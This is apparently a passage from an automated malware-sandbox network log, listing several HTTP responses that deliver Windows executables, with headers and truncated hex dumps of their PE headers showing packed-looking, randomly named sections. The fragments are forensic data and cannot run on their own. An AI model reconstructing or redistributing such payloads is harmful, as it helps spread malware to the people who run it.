Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 22:58:10 GMTContent-Type: application/octet-streamContent-Length: 1834496Last-Modified: Sat, 14 Dec 2024 21:12:38 GMTConnection: keep-aliveETag: "675df4c6-1bfe00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 fe 59 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 cc 03 00 00 b0 00 00 00 00 00 00 00 80 48 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 48 00 00 04 00 00 e2 b0 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 f0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 f0 01 00 00 00 20 05 00 00 02 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 b0 29 00 00 40 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 62 76 6d 78 6b 6f 62 00 80 19 00 00 f0 2e 00 00 7a 19 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 78 64 61 77 61 6c 6d 68 00 10 00 00 00 70 48 00 00 04 00 00 00 d8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 48 00 00 22 00 00 00 dc 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 22:58:18 GMTContent-Type: application/octet-streamContent-Length: 1752576Last-Modified: Sat, 14 Dec 2024 22:12:26 GMTConnection: keep-aliveETag: "675e02ca-1abe00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 d2 37 48 62 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ea 00 00 00 08 00 00 00 00 00 00 00 60 45 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 45 00 00 04 00 00 fd 27 1b 00 02 00 40 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 40 01 00 69 00 00 00 00 20 01 00 08 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 41 01 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 00 01 00 00 20 00 00 00 74 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 08 05 00 00 00 20 01 00 00 06 00 00 00 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 40 01 00 00 02 00 00 00 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 e0 29 00 00 60 01 00 00 02 00 00 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 72 62 6a 76 65 77 68 00 00 1a 00 00 40 2b 00 00 fa 19 00 00 9e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6f 64 69 6e 68 63 79 63 00 20 00 00 00 40 45 00 00 04 00 00 00 98 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 45 00 00 22 00 00 00 9c 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 22:58:26 GMTContent-Type: application/octet-streamContent-Length: 1870848Last-Modified: Sat, 14 Dec 2024 22:32:01 GMTConnection: keep-aliveETag: "675e0761-1c8c00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 62 fe 59 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 cc 03 00 00 b2 00 00 00 00 00 00 00 00 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 4a 00 00 04 00 00 c6 d2 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 54 30 05 00 68 00 00 00 00 20 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 31 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 10 05 00 00 10 00 00 00 48 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 20 05 00 00 04 00 00 00 58 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 30 05 00 00 02 00 00 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 a0 2a 00 00 40 05 00 00 02 00 00 00 5e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6a 61 6c 69 77 6f 70 6d 00 10 1a 00 00 e0 2f 00 00 06 1a 00 00 60 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 68 74 6d 76 62 6e 62 00 10 00 00 00 f0 49 00 00 04 00 00 00 66 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 4a 00 00 22 00 00 00 6a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 22:58:35 GMTContent-Type: application/octet-streamContent-Length: 1731584Last-Modified: Sat, 14 Dec 2024 22:32:07 GMTConnection: keep-aliveETag: "675e0767-1a6c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 70 66 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 66 00 00 04 00 00 01 95 1a 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 28 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 73 6f 6c 69 70 61 78 00 d0 18 00 00 90 4d 00 00 c8 18 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 6b 6f 64 77 73 71 6f 00 10 00 00 00 60 66 00 00 04 00 00 00 46 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 66 00 00 22 00 00 00 4a 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 22:58:43 GMTContent-Type: application/octet-streamContent-Length: 970752Last-Modified: Sat, 14 Dec 2024 22:30:05 GMTConnection: keep-aliveETag: "675e06ed-ed000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 de 06 5e 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 20 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 f8 63 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 4c 65 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 4c 65 01 00 00 40 0d 00 00 66 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 5a 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 Dec 2024 22:58:46 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 22:58:51 GMTContent-Type: application/octet-streamContent-Length: 2746368Last-Modified: Sat, 14 Dec 2024 22:30:33 GMTConnection: keep-aliveETag: "675e0709-29e800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 60 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 2a 00 00 04 00 00 21 35 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 65 61 63 78 70 67 7a 6f 00 a0 29 00 00 a0 00 00 00 86 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 62 61 67 75 67 69 79 7a 00 20 00 00 00 40 2a 00 00 06 00 00 00 c0 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 60 2a 00 00 22 00 00 00 c6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 22:59:01 GMTContent-Type: application/octet-streamContent-Length: 4438776Last-Modified: Tue, 10 Dec 2024 00:01:52 GMTConnection: keep-aliveETag: "675784f0-43baf8"Accept-Ranges: bytesData Raw: 4d 5a 60 00 01 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 52 65 71 75 69 72 65 20 57 69 6e 64 6f 77 73 0d 0a 24 50 45 00 00 4c 01 04 00 ce 3f c3 4f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 08 00 00 90 01 00 00 96 00 00 00 00 00 00 5f 94 01 00 00 10 